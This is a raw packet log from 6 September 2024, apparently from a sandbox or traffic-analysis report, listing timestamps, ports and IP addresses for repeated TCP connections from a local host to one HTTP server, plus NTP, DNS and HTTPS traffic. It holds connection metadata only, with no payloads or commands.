Sep 6, 2024 10:01:36.387224913 CEST	51464	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:36.387228012 CEST	51465	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:36.392313004 CEST	51465	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:36.397150993 CEST	80	51465	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.098670006 CEST	80	51465	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.098778963 CEST	51465	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.204444885 CEST	51465	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.204716921 CEST	51466	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.209557056 CEST	80	51466	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.209673882 CEST	51466	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.209779024 CEST	80	51465	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.209919930 CEST	51466	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.209965944 CEST	51465	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.214705944 CEST	80	51466	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.900856018 CEST	80	51466	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.900995016 CEST	51466	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.903804064 CEST	51466	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.904181957 CEST	51467	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.909029007 CEST	80	51466	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.909074068 CEST	80	51467	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:37.909172058 CEST	51467	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.909173965 CEST	51466	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.909471989 CEST	51467	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:37.914315939 CEST	80	51467	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:38.611804008 CEST	80	51467	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:38.613153934 CEST	51467	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:38.720318079 CEST	51467	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:38.720593929 CEST	51468	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:38.725480080 CEST	80	51468	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:38.725775957 CEST	80	51467	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:38.727528095 CEST	51467	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:38.727545977 CEST	51468	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:38.727710962 CEST	51468	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:38.735479116 CEST	80	51468	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:39.420641899 CEST	80	51468	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:39.420737028 CEST	51468	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:39.423434973 CEST	51468	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:39.423739910 CEST	51469	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:39.428559065 CEST	80	51468	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:39.428594112 CEST	80	51469	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:39.429001093 CEST	51468	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:39.429039001 CEST	51469	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:39.429476976 CEST	51469	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:39.434396029 CEST	80	51469	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:40.139980078 CEST	80	51469	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:40.146855116 CEST	51469	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:40.254093885 CEST	51469	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:40.254093885 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:40.259089947 CEST	80	51470	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:40.259588957 CEST	80	51469	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:40.259716034 CEST	51469	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:40.259716034 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:40.259953022 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:40.264722109 CEST	80	51470	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:40.651376009 CEST	51471	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:01:40.651417971 CEST	443	51471	34.107.243.93	192.168.2.7
Sep 6, 2024 10:01:40.651529074 CEST	51471	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:01:40.653085947 CEST	51471	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:01:40.653104067 CEST	443	51471	34.107.243.93	192.168.2.7
Sep 6, 2024 10:01:41.150199890 CEST	80	51470	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:41.153712988 CEST	443	51471	34.107.243.93	192.168.2.7
Sep 6, 2024 10:01:41.153964996 CEST	51471	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:01:41.154067993 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.158227921 CEST	51471	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:01:41.158236980 CEST	443	51471	34.107.243.93	192.168.2.7
Sep 6, 2024 10:01:41.158308983 CEST	51471	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:01:41.158396959 CEST	443	51471	34.107.243.93	192.168.2.7
Sep 6, 2024 10:01:41.161015987 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:41.162209988 CEST	51471	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:01:41.165668964 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.165927887 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:41.170681953 CEST	80	51470	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:41.257282972 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:41.264303923 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:41.269160986 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:41.359023094 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:41.375119925 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:41.392954111 CEST	80	51470	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:41.393008947 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.475739002 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:41.499483109 CEST	51472	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.499483109 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.504359007 CEST	80	51472	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:41.504581928 CEST	80	51470	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:41.506829023 CEST	51470	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.506831884 CEST	51472	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.510981083 CEST	51472	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:41.515808105 CEST	80	51472	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:42.202781916 CEST	80	51472	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:42.202946901 CEST	51472	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:42.206185102 CEST	51472	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:42.206520081 CEST	51473	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:42.211365938 CEST	80	51472	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:42.211462021 CEST	80	51473	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:42.211493969 CEST	51472	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:42.211990118 CEST	51473	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:42.212651968 CEST	51473	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:42.217422962 CEST	80	51473	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:42.950123072 CEST	80	51473	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:42.950213909 CEST	51473	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:47.585964918 CEST	51473	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:47.585964918 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:47.590984106 CEST	80	51474	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:47.591094971 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:47.591227055 CEST	80	51473	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:47.591357946 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:47.591408968 CEST	51473	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:47.596174955 CEST	80	51474	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:48.285082102 CEST	80	51474	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:48.289659023 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.289659023 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.294490099 CEST	80	51474	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:48.515644073 CEST	80	51474	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:48.519188881 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.633552074 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.633840084 CEST	51475	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.638633013 CEST	80	51475	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:48.638731956 CEST	51475	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.638814926 CEST	80	51474	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:48.638890982 CEST	51474	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.639017105 CEST	51475	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:48.643750906 CEST	80	51475	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:49.330308914 CEST	80	51475	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:49.330387115 CEST	51475	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:49.333456039 CEST	51475	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:49.333766937 CEST	51476	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:49.338576078 CEST	80	51475	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:49.338588953 CEST	80	51476	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:49.338795900 CEST	51476	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:49.338798046 CEST	51475	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:49.338830948 CEST	51476	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:49.343602896 CEST	80	51476	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:50.216582060 CEST	80	51476	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:50.216651917 CEST	51476	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:50.324594975 CEST	51476	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:50.325100899 CEST	51477	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:50.329932928 CEST	80	51476	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:50.330045938 CEST	51476	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:50.330125093 CEST	80	51477	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:50.330251932 CEST	51477	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:50.330410957 CEST	51477	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:50.335184097 CEST	80	51477	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.031719923 CEST	80	51477	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.031860113 CEST	51477	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.034636021 CEST	51477	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.035058975 CEST	51478	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.039772034 CEST	80	51477	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.039884090 CEST	80	51478	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.039915085 CEST	51477	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.042984009 CEST	51478	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.043154955 CEST	51478	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.048023939 CEST	80	51478	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.274585009 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:51.279448032 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:51.375247002 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:51.380160093 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:51.744625092 CEST	80	51478	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.744724035 CEST	51478	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.860380888 CEST	51478	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.860598087 CEST	51479	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.865415096 CEST	80	51479	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.865502119 CEST	80	51478	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:51.865511894 CEST	51479	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.865569115 CEST	51478	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.865731955 CEST	51479	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:51.870445967 CEST	80	51479	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:52.738188982 CEST	80	51479	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:52.739490032 CEST	51479	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:02:01.293693066 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:01.298623085 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:02:01.384923935 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:01.390809059 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:02:11.332725048 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:11.337625980 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:02:11.535765886 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:11.540649891 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:02:21.537631035 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:21.542439938 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:02:21.738411903 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:21.743235111 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:02:31.631685972 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:31.636533022 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:02:31.832293987 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:02:31.837191105 CEST	80	49849	34.107.221.82	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 6, 2024 09:57:53.123490095 CEST	123	123	192.168.2.7	13.95.65.251
Sep 6, 2024 09:57:53.297808886 CEST	123	123	13.95.65.251	192.168.2.7
Sep 6, 2024 09:57:54.647200108 CEST	123	123	192.168.2.7	13.95.65.251
Sep 6, 2024 09:57:54.816209078 CEST	123	123	13.95.65.251	192.168.2.7
Sep 6, 2024 09:58:14.776859999 CEST	53	58993	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:16.203917980 CEST	54232	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:16.204142094 CEST	64364	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:17.289216995 CEST	53	53058	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:17.718255997 CEST	53	58364	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:19.422247887 CEST	59970	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:19.422389030 CEST	58088	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:19.422728062 CEST	61768	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:19.422866106 CEST	60118	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:19.429384947 CEST	53	59970	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:19.429408073 CEST	53	60118	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:19.429425001 CEST	53	58088	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:19.429882050 CEST	53	61768	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:19.522047997 CEST	60988	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:19.522270918 CEST	49153	53	192.168.2.7	1.1.1.1
Sep 6, 2024 09:58:19.528898001 CEST	53	60988	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:19.529001951 CEST	53	49153	1.1.1.1	192.168.2.7
Sep 6, 2024 09:58:20.196090937 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.499802113 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.673661947 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.673680067 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.673692942 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.673715115 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.673733950 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.674341917 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.679316998 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.679428101 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.680080891 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.681113005 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.777390003 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.777431965 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.777441025 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.777451038 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.778590918 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.779040098 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.780081034 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.780250072 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.820404053 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.820666075 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.821017981 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.860079050 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.860311031 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.860621929 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.860749006 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.892385006 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.892755985 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.921237946 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.950809002 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.960089922 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.960829020 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.960994005 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.961572886 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.961627960 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.961785078 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.961877108 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.991240978 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.991837978 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.992149115 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.994663000 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.576349020 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.576505899 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.681014061 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.681844950 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.682025909 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.682411909 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.683013916 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.858834028 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.859323978 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.929600954 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.929892063 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.958822966 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.979962111 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.986175060 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.986413956 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:22.035223007 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:22.035727024 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:22.035804987 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:22.036161900 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:22.346380949 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:22.347230911 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:22.347667933 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.447765112 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:22.448224068 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:22.448234081 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:22.448720932 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:22.448991060 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:22.662096024 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.799141884 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.799161911 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.799793959 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.805490971 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.805536032 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.805568933 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.805664062 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.806140900 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.806554079 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.807468891 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.807596922 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.807984114 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.807984114 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.815025091 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.903532028 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.903556108 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.903907061 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.903942108 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.903999090 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.910979986 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.911271095 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.919483900 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.921603918 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.922008991 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.925714970 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.926278114 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.927040100 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.952605963 CEST	55459	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.026659966 CEST	443	55459	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.447086096 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.491595030 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.491715908 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.590711117 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.591689110 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.591701984 CEST	443	59146	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.591949940 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.766586065 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.916954041 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.916970968 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.917714119 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.917926073 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.918009043 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.918025970 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.918287992 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.933074951 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.965993881 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.966104984 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.064954996 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.064980030 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.065017939 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.065045118 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.065797091 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.066052914 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.166476011 CEST	443	59007	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.207876921 CEST	59007	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.259212017 CEST	59146	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.259294033 CEST	59146	443	192.168.2.7	172.64.41.3
